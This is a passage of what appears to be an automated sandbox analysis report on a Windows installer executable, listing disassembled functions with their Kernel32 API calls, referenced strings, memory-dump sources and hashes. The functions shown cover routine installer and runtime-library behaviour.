                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$installer_type
                                                                                                                        • API String ID: 4218353326-1463633511
                                                                                                                        • Opcode ID: 0f1cbc128df8ed011629e87bee77f39731e64bbca8a50ba4012b7e4347c41694
                                                                                                                        • Instruction ID: 3065e2436954edee576f9c408a7e97aa396eae2054831ed547e3dca1e61ff7b8
                                                                                                                        • Opcode Fuzzy Hash: 0f1cbc128df8ed011629e87bee77f39731e64bbca8a50ba4012b7e4347c41694
                                                                                                                        • Instruction Fuzzy Hash: 1A612BB1D0428E6FDF209AA5C885EBEB7B9FF82304F140424E415F7141E771A9858B91
                                                                                                                        Function 008DA2A0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(009714A8,?,?,?,?,?,?,?,?,?,?,008AE91D,1207E8D8,?,008AE531), ref: 008DA36C
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(009714A8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008DA3B9
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(009714A8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008DA479
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008DA500
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008DA536
                                                                                                                        Strings
                                                                                                                        • Stability.DumpWithoutCrashingStatus, xrefs: 008DA3EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$CriticalInit_thread_headerReleaseSection$AcquireEnterLeave
                                                                                                                        • String ID: Stability.DumpWithoutCrashingStatus
                                                                                                                        • API String ID: 3781742723-453052744
                                                                                                                        • Opcode ID: 4b4f42207103eacf8e24d38e9291371360ca417938ded05d34e293e262e1dcb2
                                                                                                                        • Instruction ID: 3e83735f0ef34dd38e59ee6f7a4d43ae13d0a98640dec2aa1aa9428eb796a428
                                                                                                                        • Opcode Fuzzy Hash: 4b4f42207103eacf8e24d38e9291371360ca417938ded05d34e293e262e1dcb2
                                                                                                                        • Instruction Fuzzy Hash: 34614BB6A183009FC718DF2CE886A2A77E0FB85314F14862DF849C73A2D7709845DB93
                                                                                                                        Function 008B0660 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 174COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B0836
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B082F
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008B083D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 4218353326-4247613780
                                                                                                                        • Opcode ID: 53532708baedeb20ad823da69adfb089a53c350e4eb54c20446764a986ee70e5
                                                                                                                        • Instruction ID: 66e244085b8d8a17ae38e0689bf03fbdb5c59434c496b6af53d073e0b2b3f1c9
                                                                                                                        • Opcode Fuzzy Hash: 53532708baedeb20ad823da69adfb089a53c350e4eb54c20446764a986ee70e5
                                                                                                                        • Instruction Fuzzy Hash: EB5123B1E042198BD710DF34EC81AAAB3A5FF98314F144179F908D7392E771AA81DF95
                                                                                                                        Function 008401D0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 153synchronizationthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00840202
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00840213
                                                                                                                        • GetLastError.KERNEL32 ref: 00840220
                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000,Failed to wait for install async exit. Terminate install_thread_,00942CFB,00000001,~Installer,000001F4,?), ref: 00840280
                                                                                                                        Strings
                                                                                                                        • ~Installer, xrefs: 00840240
                                                                                                                        • Failed to wait for install async exit. Terminate install_thread_, xrefs: 00840255
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorEventLastObjectSingleTerminateThreadWait
                                                                                                                        • String ID: Failed to wait for install async exit. Terminate install_thread_$~Installer
                                                                                                                        • API String ID: 2510535927-3230243165
                                                                                                                        • Opcode ID: 6cc45fa76fc0beb963217e048ff221fb58345a2f5504a90dd40f1d539eab313f
                                                                                                                        • Instruction ID: e78ee28d6748b5994e9bece558c784d8d1e41b0d06ced588f892813a22b8923c
                                                                                                                        • Opcode Fuzzy Hash: 6cc45fa76fc0beb963217e048ff221fb58345a2f5504a90dd40f1d539eab313f
                                                                                                                        • Instruction Fuzzy Hash: 6D51E6B0A047099BEB259B34DC06B5B7A91FF50715F04482CF6DAD2292DB71B855CB43
                                                                                                                        Function 0089E300 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 0089E362
                                                                                                                        • CreateFileW.KERNEL32(?,0089EFEC,00000007,00000000,00000003,02000000,00000000), ref: 0089E393
                                                                                                                        • GetLastError.KERNEL32 ref: 0089E39F
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0089E3B4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLast$AttributesCreate
                                                                                                                        • String ID: PathHasAccess$file_util_win.cc
                                                                                                                        • API String ID: 1299224125-729966965
                                                                                                                        • Opcode ID: 52fd4c023b752b7eeaebcb258bd20a468d396504b1d605238524cc2a33c31175
                                                                                                                        • Instruction ID: 961d4858737d02597bd59d755637f5bee5175fb553549dfab6aca1f4aad927f6
                                                                                                                        • Opcode Fuzzy Hash: 52fd4c023b752b7eeaebcb258bd20a468d396504b1d605238524cc2a33c31175
                                                                                                                        • Instruction Fuzzy Hash: CC2136315043146BDB10AB38CC86B6FB794FFC9724F144728F995D7280EB60A94597C2
                                                                                                                        Function 008F0780 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitOnceExecuteOnce.KERNEL32(00972A68,008F0610,?,00000000,00000000,008F0440,?,?,00000130), ref: 008F07A9
                                                                                                                        • GetLastError.KERNEL32(?,?,00000130), ref: 008F07C7
                                                                                                                        • TlsGetValue.KERNEL32(?,?,00000130), ref: 008F07D5
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000130), ref: 008F07DE
                                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,?,?,00000130), ref: 008F0801
                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00972A74,?,?,00000130), ref: 008F0814
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00972A74,?,?,00000130), ref: 008F0825
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExclusiveLastLockOnceValue$AcquireExecuteInitRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 389898287-0
                                                                                                                        • Opcode ID: 7faf3a57b70e594ee65cdfa7998d372c84a193d4133b7de33ebf16132986b015
                                                                                                                        • Instruction ID: e0bc9df0426940fdc485dd777b70a7792e437bc8a39033affad45f3fb53db3bf
                                                                                                                        • Opcode Fuzzy Hash: 7faf3a57b70e594ee65cdfa7998d372c84a193d4133b7de33ebf16132986b015
                                                                                                                        • Instruction Fuzzy Hash: 78219D72A24308AFDB106F75EC49A7A7768FB85726F000034FE0AD7291DB709950EBA5
                                                                                                                        Function 0091EB77 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,0091EC86,?,00000022,00000000,?,?,?,0091E7BF,00000022,FlsSetValue,00936768,FlsSetValue,?), ref: 0091EC38
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                        • Opcode ID: 41534b30734edec74bad544079a842e6f4b1b4fbed7ace3fbc25c28ff4b896e5
                                                                                                                        • Instruction ID: ddbac382ae4e24ee45d58fe9a46093e5fa6bbb5490d216a269cba478d6c4ff1f
                                                                                                                        • Opcode Fuzzy Hash: 41534b30734edec74bad544079a842e6f4b1b4fbed7ace3fbc25c28ff4b896e5
                                                                                                                        • Instruction Fuzzy Hash: 08212731B05319ABC722AB65EC45BEB375C9B51760F250514FD42A7280D730EE40DBD0
                                                                                                                        Function 008CE2A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008CE2D9
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,008A048D), ref: 008CE2FB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 008CE307
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,008A048D), ref: 008CE31C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$AddressCurrentEnterHandleInit_thread_headerLeaveModuleProcProcess
                                                                                                                        • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                        • API String ID: 835113086-1680159014
                                                                                                                        • Opcode ID: aaf8df3cbee6771e9b55df956e6663bf7ce7bf6137db315046b89b57269315ac
                                                                                                                        • Instruction ID: bfb601acad55756568aebc155182d185d795493245ae67298f180dc191de0fb9
                                                                                                                        • Opcode Fuzzy Hash: aaf8df3cbee6771e9b55df956e6663bf7ce7bf6137db315046b89b57269315ac
                                                                                                                        • Instruction Fuzzy Hash: 0A11E6766542889FCB10AB78EC85F6A3BE8FB85359F040128FD05C7391DB709904DB62
                                                                                                                        Function 009006A3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0090071E,00900926), ref: 009006BA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 009006D0
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 009006E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                        • API String ID: 667068680-1718035505
                                                                                                                        • Opcode ID: c106dbdfd16a21e0a5e0d32f37b4009dd36f7cbc4d1f8fe75f8592668a627884
                                                                                                                        • Instruction ID: 28459c7c37d1af8cbdd4bbee44c781aa421bd37de2f081cb86e0cc061e5270fc
                                                                                                                        • Opcode Fuzzy Hash: c106dbdfd16a21e0a5e0d32f37b4009dd36f7cbc4d1f8fe75f8592668a627884
                                                                                                                        • Instruction Fuzzy Hash: EAF022312593125FCB201FB85CC0BB722CC9AC1349B044579E802C31C0EF6ADC406F90
                                                                                                                        Function 0595F768 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0595F76F
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0595F77A
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0595F7E8
                                                                                                                          • Part of subcall function 0595F8CB: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0595F8E3
                                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 0595F795
                                                                                                                        • _Yarn.LIBCPMT ref: 0595F7AB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                        • String ID: VD
                                                                                                                        • API String ID: 1088826258-1791571226
                                                                                                                        • Opcode ID: 26079ed9ee3483d7cc7bdc0e8edb516583ced96767607a64b300030e793f1357
                                                                                                                        • Instruction ID: f248d190520fdd91b13b4546c123d92fd234184c19094bb824d4d2634ae6d956
                                                                                                                        • Opcode Fuzzy Hash: 26079ed9ee3483d7cc7bdc0e8edb516583ced96767607a64b300030e793f1357
                                                                                                                        • Instruction Fuzzy Hash: 6E01DFB5B006109BDB06EF20D85893C77B5BFC1370B19011ADD025B391CF38AA56CBC6
                                                                                                                        Function 0085A540 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,?,?,?,?,E8E931F0,000B54B8,?,?,?,?,00000000,00000006,?lang=,0010C25D,FFFFFFBA), ref: 0085A54E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilterEx), ref: 0085A590
                                                                                                                          • Part of subcall function 008F92F0: __Init_thread_header.LIBCMT ref: 008F9346
                                                                                                                          • Part of subcall function 008F92F0: GetVersionExW.KERNEL32(?), ref: 008F937C
                                                                                                                          • Part of subcall function 008F92F0: GetProductInfo.KERNEL32(?,?,00000000,00000000,?), ref: 008F9393
                                                                                                                          • Part of subcall function 008F92F0: __Init_thread_header.LIBCMT ref: 008F93EF
                                                                                                                          • Part of subcall function 008F92F0: GetNativeSystemInfo.KERNEL32(0096599C), ref: 008F9420
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 0085A574
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressInfoInit_thread_headerProc$HandleModuleNativeProductSystemVersion
                                                                                                                        • String ID: ChangeWindowMessageFilter$ChangeWindowMessageFilterEx$user32.dll
                                                                                                                        • API String ID: 39747407-1782194287
                                                                                                                        • Opcode ID: b98feddab3e757ba33de3fc337550724b73bde3835d51045617df9caac76f03d
                                                                                                                        • Instruction ID: 03f3c1f743328bb122fe8fc88be58f6c2341446939df19691a776988abaabb05
                                                                                                                        • Opcode Fuzzy Hash: b98feddab3e757ba33de3fc337550724b73bde3835d51045617df9caac76f03d
                                                                                                                        • Instruction Fuzzy Hash: 72F0963A3553147BCF1437F55C8DF6E3758FB8576BF140014FA02D2191DA7584409B62
                                                                                                                        Function 009141C1 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 160c4f079d4e1b013aef725de3c63edc246fd78af1b96f33e874d406d3f39b3b
                                                                                                                        • Instruction ID: 2c8bd7d8b460b32d6553eeb9060297af7f4d5a7be8ee162b130e61615f36247d
                                                                                                                        • Opcode Fuzzy Hash: 160c4f079d4e1b013aef725de3c63edc246fd78af1b96f33e874d406d3f39b3b
                                                                                                                        • Instruction Fuzzy Hash: 7BB1E0B0B0424D9BDB01DFA9D880BEE7BBAAF89314F144158F5119B292C770DDD2CBA1
                                                                                                                        Function 009306E0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(0000000B,?), ref: 0093078B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
